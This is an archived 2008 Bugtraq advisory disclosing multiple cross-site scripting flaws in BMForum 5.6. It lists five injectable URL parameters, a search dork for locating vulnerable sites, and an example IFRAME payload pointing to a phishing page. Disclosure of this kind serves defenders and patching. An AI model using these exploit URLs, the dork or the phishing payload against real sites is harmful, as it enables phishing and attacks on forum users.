bugtraq - BMForum Remote 5.6 Miltiple XSS Vulnerability

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Date: 22 May 2008 13:12:21 -0000
From: tan_prathan@...mail.com
To: bugtraq@...urityfocus.com
Subject: BMForum Remote 5.6 Miltiple XSS Vulnerability

==========================================================
      BMForum Remote 5.6 Miltiple XSS Vulnerability             
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : BMForum
 VERSION     : 5.6 (Lastest Version)
 VENDOR      : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
[-] http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

--- Note ---
 Very Dangerous for using 'IFRAME' TAG for Phishing Techniques
 
 Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME src=http://phisherpage.com width="900" height="600">
																.

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################